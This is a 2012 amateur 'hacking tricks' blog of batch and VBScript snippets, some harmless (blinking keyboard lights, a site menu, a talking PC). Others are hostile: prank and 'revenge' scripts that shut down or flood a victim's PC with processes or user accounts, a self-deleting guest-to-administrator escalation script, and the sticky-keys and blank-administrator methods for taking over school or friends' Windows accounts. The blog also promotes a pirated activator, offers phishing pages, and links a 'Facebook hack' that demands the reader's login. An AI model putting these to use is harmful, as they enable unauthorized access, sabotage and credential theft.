31 March 2012

Make your Computers Num Lock and Caps Lock to do like a disco light...................................................................

Keyboard tricks
Disco Lights
Want to have some disco effects do this:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::----------------************
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



And then save it with .vbs extension and then double click on the file................................................
Now see your lights it will give you some disco effects to stop it you can not do it simply for stopping this You have to restart your PC or open task manager by pressing CTRL+SHIFT+ESC key from the keyboard then click on Processes tab after that find wscript.exe then end this process.......................................
ITS done..............................................................................................................................................

Site Selector Made From Batch programming......................................................

Friends Make site selector that suits youuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu................................................................................................::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
color 2f
title Site Selector by Abhinav
:top
echo ***************************************************************
echo.
echo Site Selector
echo.
echo ***************************************************************
echo.
echo Key: [1] Google - Search Engine
echo [2] ABHINAV'S HACKING Blog- A Blog by Abhinav Srivastava

echo [3] Hotmail - Mail Server
echo [4] Yahoo - Search Engine/Mail Server
echo [5] Facebook - Social Networking
echo [6] Myspace - Social Networking
echo [7] CNN - News
echo [8] Weather - Weather
echo [9] WikiHow - A How-To Website
echo [10] Instructables - A How-To Website
echo [11] YouTube - Online Videos
echo [12] Answers - Online Encyclopedia
echo [13] Wikipedia - Online Encyclopedia
echo.
echo [e] Exit
echo.
echo ***************************************************************
echo Enter the number of the website which you would like to go to:
echo.
set /p udefine=
echo.
echo ***************************************************************
if %udefine%==1 start www.google.com
if %udefine%==2 start www.expertscomp.blogspot.com

if %udefine%==3 start www.hotmail.com
if %udefine%==4 start www.yahoo.com
if %udefine%==5 start www.facebook.com
if %udefine%==6 start www.myspace.com
if %udefine%==7 start www.cnn.com
if %udefine%==8 start www.weather.com
if %udefine%==9 start www.wikihow.com
if %udefine%==10 start www.instructables.com
if %udefine%==11 start www.youtube.com
if %udefine%==12 start www.answers.com
if %udefine%==13 start www.wikipedia.com
if %udefine%==e goto exit

cls
echo ***************************************************************
echo.
echo Thank You for using Site Selector by Abhinav
echo.
echo ***************************************************************
echo Type [e] to exit or [b] to go back and select another site.
echo.
set /p udefine=
echo.
echo ***************************************************************
if %udefine%==b goto top
if %udefine%==e goto exit
:exit
cls
echo ***************************************************************
echo.
echo Thank You for using Site Selector by Abhinav
echo.
echo ***************************************************************
pause
exit


 Now save it with .bat extension..................................................................................................

Amaze your friends!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


Amaze your friend with this trick of batch coding this will completely amaze your friend...............................................                    Lets begin......................................................to hack...................................................................................................... 

@echo off
color 47
net stop themes >nul
title DEEP VIRAL INFECTION!
echo VIRAL INFECTION!!!
echo VIRAL INFECTION!!!
echo VIRAL INFECTION!!!
echo ERROR!!!
echo -
echo virus - TROJAN_DEMOLISHER code #45643676
echo -
echo FIREWALL - FAILED
echo -
echo ANTI-VIRUS - FAILED
echo -
echo IP ADDRESS BREACHED!
echo -
echo VIRUS ATTAINING: ****-****-****-8894
echo -


pause
cls
echo -
echo SCANNING INFECTED AREAS...
echo -


pause


set /a num=0
:repeat1
set /a num=%num% +1
echo %num%
if %num%==100 goto end
goto repeat1
:end
cls
echo -
echo 86.5 PERCENT OF MEMORY INFECTED
echo -
echo INFECTION FATAL!
echo -
echo DELETION OF ENTIRE CONTENTS OF LOCAL DISK C: REQUIRED
echo -


pause
cls
echo -
echo DELETING HARD-DRIVE C:
echo -
dir /s


pause
cls
echo -
echo CONTENTS OF HARD-DRIVE C: ERASED
echo -


pause
cls
echo -
echo SCANNING...
echo -


set /a num1=0
:repeat2
set /a num1=%num1% +1
echo %num1%
if %num1%==100 goto end1
goto repeat2
:end1
cls
echo -
echo 0.00 PERCENT OF HARD-DRIVE INFECTED
echo -
pause


echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR
echo ERROR


pause
cls
title SYSTEM FAILURE
color 17
echo ERROR!
echo -
echo VISUAL MEMORY LOST!
echo -
echo RAM LOST!
echo -
echo CORE PROCESSOR FAILING...
echo -
echo TOTAL SYSTEM CRASH IMMINENT!
echo -
echo -


pause
cls
echo -
echo -
echo -
echo SHUTDOWN COMPUTER NOW TO AVOID RISK OF FIRE!
echo -
echo -
echo -


pause
cls
echo -
echo -
echo -
echo SEEK PROFESSIONAL HELP IMMEDIATLY TO PREVENT FURTHER DAMAGE!
echo -
echo -
echo -
pause
start shutdown -s -t 60 -c "SYSTEM FAILURE<SHUTTING DOWN TO AVOID FURTHER DAMAGE!"


Now save it with .bat extension and then open this file if you want to abort the shutdown open command prompt then type shutdown -a and then press enter but remember you have to do it with in 60 seconds......................................................

30 March 2012

How to find your IP Address with command prompt.............................

Friends today i will tell you that how to find your IP address just watch it below:

Press Windows+R key from the keyboard
Type CMD
A new window will open it will look like the Black Screen like this:---------------------











Type their ipconfig ansd press enter












Their you can see IPv4 address in front of it you can see your IP adresss












Its done............................................................................................

Hide Drives From Your PC


How To Hide Drives On Your PC

How To Hide Drives On Your PC


1. Go to Start --> Run --> Regedit.
2. Now to go this path

 "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"

3. In a right panel create a new DWORD and name it as nodrives , now modify the hex value to  3FFFFFF.


4. Now restart your PC and then you will not find your drives in My Computer.


5. If you want to see your drive then go to the path above and delete the nodrives DWORD.

Make a random password generator from notepad....................................................


How To Create Password Generator Using Command Prompt

How To Create Password Generator Using Command Prompt

1. Click on start -> run -> notepad.
2. Copy the below code in to notepad.

@echo off
:a
echo Here are 3 random passwords
echo %random%, %random%, %random%
pause
cls
goto a
3. Now save the notepad as  Generator.bat.
Note: Save the file by clicking on File Type-> All Files.
4. There fore password generator is created.

It only generates 3 passwords at at time.

Create An E bomb To Hang Your PC...........................................


Create an E Bomb to hang your PC with notepad
How To Create an eBomb

How To Create an eBomb

1. Click on Start-> Run -> NotePad.
2. Copy the following code.

@echo off
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls


begin
goto %random%

:1
start cmd.exe
goto begin

:2
start paint.exe
goto begin

:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe "www.13downloads.com"
goto begin
3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat

 Note:
 This filename.bat makes your pc slow because the above program code is to open multiple process at at time so that it make your pc hang.

Blocking USB Port from Registry Editor................................

So friends your PC is used by someone else and you do not want that they use Pen Drive in your PC to enter Viruses Just do the follwing:------------------------------------------------------


1. Click on start -> Run  and type regedit and press enter.
2. Now Go to the path 

HKEY_LOCAL_MACHINE\SYSTEM\Current\ControlSet \Services\UsbStor
3. Now click on the USBSTOR, then on the right pane you will see "Start" string.
4. Right click on the Start String and Modify the value to the  4 , then your USB Ports wil be disabled.
5. To enable the USB Port modify the value to 3 in USBSTOR.


Now its done.............................................................................

Matrix Wall In Command Prompt

Now here is the great Matrix Wall but in Command Prompt its cool Entertaining code lets hack command prompt for fun.....................................................................................................................................
Open Notepad and type:
@echo off
color 0a
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
goto top
Now Save it with .bat extension.........................................................

Crash the PC with this virus coding.

So you have lots enemy and you want to take revenge from you can fuck their PC with this virus coding just copy and paste this code in their computer and save it as AKS.bat...........................................Open
Notepad and type:
@echo off
echo Muhahahaha!     
:add     
net user %random% /add     
start acf.bat     
goto add

Then save it as AKS.bat
Now its done............................
Happy Crashing................................



28 March 2012


Abhinav's Snake and ladder gamePlay Snake Game that is made by Abhinav

Play Snake Game

Sorry your browser does not support HTML5

20 March 2012

Hello friends today i will post you how to hack Windows 7 Password with stick key method............................

So friends you wanna hack Windows 7 password with more ease that I have posted earlier in Hack Windows 7 Password with bootable CD...............Yes don't be surprised that it is more easy then Hacking Windows 7 Password with bootable CD.Yes it more easy then anything else.
So friends here is the hack begins.Now what you need is only a bootable CD of Windows 7.
Friends you think that I am telling you the old trick but its not true.
Now see carefully................................................................................................................................
  • Insert your bootable disk in the DVD Writer and then press any key to boot from the CD or DVD.
  • Now Select the Language then click on Next.
  • After that Select Repair your Computer.
  • After all of these Select your OS(Operating System),then click on Next.
  • Now Select Command Prompt.
  • Your hack begins from now on.
  • Now what you have to type in Command Prompt is (Copy C:\windows\system32\sethc.exe) then press enter.

  •   Now type (Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe) then press enter.
You have done,you have hacked windows password now just exit from Command Prompt and click on restart.
  • Now when  you see the login screen press Shift key up-to five times.You will see the Magic that instead of stick keys you have opened the command prompt.
  • Now again in Command prompt type net user then press enter.
  • Now net user username password and then press enter.(Username=account made earlier & password=the password you want to enter)
  • Its done.You have hacked your Windows 7 Password By using stick keys hack...................................
  • Now Enjoy...........................................

Windows XP admin and local account password hack..........................

So friends you wanna hack windows XP password that's good.You want to hack your Windows XP password in School PC or you want to hack your friends PC only for fun.I also want this before i was not knowing this.So here is the hack begins,Earlier i have posted about hacking of Windows 7 Password and here is the link for hacking Windows 7 Password......................Now i will tell you how to hack windows XP password..........................................
Now what you got when you access some restricted account in school pc or your friends PC.........
  • Now what you have to do is when you open your pc just press CTRL+ALT+DELETE three times.
  • A pop up will appear now in the user name press administrator and leave the password blank.
  • And then press enter.
  • Now you are in administrator mode .
  • Now press Windows+R key and then type control userpasswords2.
  • After that press enter.
  • Now select an account Whose password have to be reset and then click on reset.
Wow, you Have successfully hacked your Windows XP passowrd.................
Its done you have hacked it...................................................................

May be it will not work on some of the PC if, it will not work then Contact me.........................

16 March 2012

Open Windows Only When You Insert Your Pendrive....

Hey friends do you want to make your Pen drive acts as a password for your windows.Yes it is true no body can touch your PC until they don't have your Pen drive.Isn't it is cool..........................
Make your pen drive acts a password for you follow this steps:
Press Windows+r key from the keyboard then type syskey and hit enter now you will see three options there 1.OK 2.Cancel 3.Update
Click on third option Update
Now You have 2 options
1:Password Start up (This options helps the user to enable the password whenever he/she bots up the system this is not an account that you have created it is a password for booting in)
2:System Generated Password (In this option you will see two more options Store Start up key in floppy disk and second Store Star up key Locally.)
Select option Store Start up key in floppy disk Now insert your pen drive and then select OK up-to three times until syskey  pop up window closes.
Then Restart Your Computer and see the magic it will ask you for your pen-drive to open your PC(But remember first change drive letter to A)For changing the drive letter to a you have to do the following open control pannel then click on System and Security option  after that select Create and format hard disk partition then choose your pen-drive and then select Change drive letter and paths Change this drive letter to A.Then You Can do the above trick to Open Windows Only When You Insert Your Pen-drive..................................................... Need any help comment here or contact me on Facebook..............................................

Hello Friends Activate Windows without any product key in just easy steps.............

Hello friends today i am posting this because i was also suffering from this problem and i am very happy today that i have got this trick to activate windows successfully...................
Now friends you will be very happy after seeing this post just because i know that,how it feels when you have to format your Comp or Laptop after every 1 month after installing the cool software's and then formatting it So you have to do is just Download this Software name :7Loader Release 4.exe or Windows 7 Activator search this software on Google or Download it from here:  Windows Activator
And then run  7Loader Release 4.Exe after that select task then select your machine such as Lenovo,Dell or whatever your machine name is.Then Select all the option 1 by 1 then restart your machine..............................(But remember first disable your anti-virus if any)......................................................
Thanking You..........................................................................

10 March 2012

Windows 8 Customer Preview Download............

Hello Friends today I am posting the download link of Windows 8 with its product key...........
                               
                       





                                         
Experience the latest Microsoft Windows 8 OS for free With product key.You Can download ISO file or direct download link for your pc.

Requirements for windows 8:

  • 1 GHz or faster 32-bit (x86) or 64-bit (x64) processor
  • 1 GB RAM (32 bit) or 2 GB RAM (64 bit)
  • 16 GB (32 bit) or 20 GB (64bit) Available Hardisk.
  • DirectX 9 graphics device with WDDM 1.0 or higher drivers.
  • Taking advantage of touch input requires a screen that supports multi-touch.
ISO link for Windows 8:

 

  3. PRODUCK KEY
  • 6RH4V-HNTWC-JQKG8-RFR3R-36498

Want to view hidden passwords behind the asterisks.

Hey Friends did you ever thought what you are writing in the password field yes you can see the password behind this............................
For viewing your password behind the asterisks copy and paste this Java script in your browser:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i)
{ if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert
("There are no passwords in forms on this page.");})();

Make your Computer talk whatever you type.......

Want to make your computer talk whatever you type for doing yhis do this:
Open Notepad
Type Following code there :
      Dim message, sapi
      message=InputBox("What do you want me to say?","NO.1 Hacker Abhinav ")
      Set sapi=CreateObject("sapi.spvoice")
      sapi.Speak message

And in last save it With .vbs extension

Now open that program and type whatever you want to speak your pc..............................

Watch Star on Pc or Laptop through Command Prompt

To Watch Star Wars on command prompt. 1.Open Command prompt  by entering windows + r key from the keyboard......................................................................................................................................................
From the keyboard press Window + r  key then type cmd after that in command prompt type telnet then press o key and then enter after that write towel.blinkenlights.nl and in last press enter again and after that take some popcorn and enjoy the movie..............................................
If any problem comment here or contact me...................................

What is Phishing???????????????????????????????

Hey friends today I will explain what is phishing????????????????????????????????????????????
Phishing is the technique for hacking the password of the user and so onnnnnnnnnnnnnnnnnnnnn.......................

Hey Friends, Phishing means to make a same website like the original one uploading on server and if the user will go on that website and enters the username and password of the account the username and password instead of going to the real server it goes to the user who have made that phishing page or the uploader who have uploaded this page on the website...............................................................h


Making a phishing page is the basic steps for an hacker if he has the good knowledge of HTML,Java Script,SQL and other languages..........................................


If you want some phishing page contact me or comment on this page................................................

09 March 2012

Write Upside Down any letter........

Hey Friends wants to amaze your friend by writing the words in upside down format here is the trick.

Just go here and type the words upside down to amaze your friend Go here.........

Tracing the world...............................

Want to trace the person who is disturbing you by calling on your Phone or landlines Just go on this website and trace anything you want......................................

Website for tracing is:      Trace Here OR Trace Here

Making of Recycle Bin in pen drive or flash drive...............................


Making dustbin in pen drive or in flash drive in just a minute:------

There is only one  ways to this trick:-------------------------------------

1.Download Ibin from here:  IBIN Download

Now after downloading this open this software and it will look like this:
After That follow the instruction by the software.................


Thanks for viewing this page.................

Hack Windows OS in guest account...............




Hacking Windows OS(Any Version) Password from guest account.....
Want to hack Windows Password without any win 7 CD that i have told you here.................................
Now what you have to do is Open Notepad.
And Write the following in notepad and then save it with .bat extension........................
Script:                   



echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
 



And then open that batch file you have made........
After that when you will open the command prompt will open and close automatically and you will be switched from guest account to administrator......................... 

08 March 2012

Notepad Virus for opening infinite notepad................

  1. Virus for opening thousands of notepad



Follow these steps :
  1. Open notepad.
  2. Then type following:
  3. @ECHO off
  4. :top
  5. START %SystemRoot%\system32\notepad.exe
  6. GOTO top
  7. Save it with .bat extension.

  1. Now you have done open that file and see the magic.........

07 March 2012

Steanography Hacking.............................


Steanography
Steanography Hacking


First of all what is Steanography:-
Steanography IS the technique which helps the user to hide the real message behind the image..................

Now how to do Steanography-----------
You Need Command Prompt To do this
Let us take an example:-
My Picture aks.png(.png is the extension of your image) and a text file name hello.txt which is stored in d: drive
& i want to hide this text file in the image So we will do this
first of all open command prompt then type Cd /d D:
Then your directory will be changed to D:
Now type : copy /b 
aks.png +hello.txt Final.jpg         (Replace aks.png with your image also write the extension of the image file & also replace hello.txt with your txt file and then press enter) Its done your image will be saved in D drive as you have change the directory to d)

How it works :---------------------------------------------------------------------------
As you  have given the command copy /b now copy indicates that for copying and /b refers to binary file now this command comes copy /b aks.png+hello.txt final.jpg  copy /b aks.png+hello.txt this will combine both the file and merge into one file that is Final.jpg

If not done contact me here Contact Me........................
Thanks for reading....................................................................

02 March 2012

Facebook Hacking




Hey friends wanna hack facebook just go here......................Hack Facebook
And then download the file to learn facebook hacking. But to download that file you have to enter your correct Facebook details......................................................................................................................................
If that link doesn't work go here Mirror Link For Facebook hacking............................


Thank You................................................

01 March 2012

Hack Window's 7 administrator password easily..................................................


Hack Windows 7

Want to Hack Windows 7 just follow the tips:-






So friends here are the steps:
  1. You need windows 7 formatting CD.
  2. Now boot with the CD.
  3. When completely booted select option Repair.
  4. Now repair window will appear.
  5. Select Command Prompt.
  6. Then type net user and then press Enter.
  7. You will see the list of users in this option eg. :-
C:\Windows\system32>net user
User accounts for \\ABHINAV-PC
-------------------------------------------------------------------------------
Abhinav                  Administrator            Guest
The command completed successfully.



    8.Now I want to hack the password of abhinav account So I will type:
     
         net user abhinav (password)
                      replace the (password with whatever you want)
             Then press Enter.
Hurray!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Yor password has been changed.







If not then contact me here facebook.com/abhinav0035bhatt
Twitter Bird Gadget